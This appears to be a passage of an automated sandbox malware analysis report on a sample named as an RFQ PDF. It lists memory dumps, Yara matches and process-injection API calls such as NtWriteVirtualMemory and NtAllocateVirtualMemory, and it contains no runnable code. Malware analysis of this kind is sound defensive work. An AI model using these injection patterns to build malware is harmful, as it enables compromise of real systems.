                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: i"m$k,I5
                              • API String ID: 0-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: i"m$k,I5
                              • API String ID: 3527976591-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: i"m$k,I5
                              • API String ID: 3527976591-782811531
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileLibraryLoadOpen
                              • String ID: P(5^${{IY
                              • API String ID: 228343584-2445343677
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $k*$Ct*w$q``
                              • API String ID: 0-340753632
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770490258.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.770486988.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.770501826.000000000041A000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.770509272.000000000041C000.00000002.00020000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: #100
                              • String ID: VB5!6&*
                              • API String ID: 1341478452-3593831657
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: k,I5
                              • API String ID: 0-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID: k,I5
                              • API String ID: 3527976591-2335973621
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID: Z
                              • API String ID: 2167126740-1505515367
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID: Z
                              • API String ID: 2167126740-1505515367
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 020BBAE2: LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateLibraryLoadMemoryVirtual
                              • String ID: Z
                              • API String ID: 2616484454-1505515367
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: MemoryVirtualWrite
                              • String ID:
                              • API String ID: 3527976591-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,7246379C,?,00000000,?), ref: 020B889B
                              Memory Dump Source
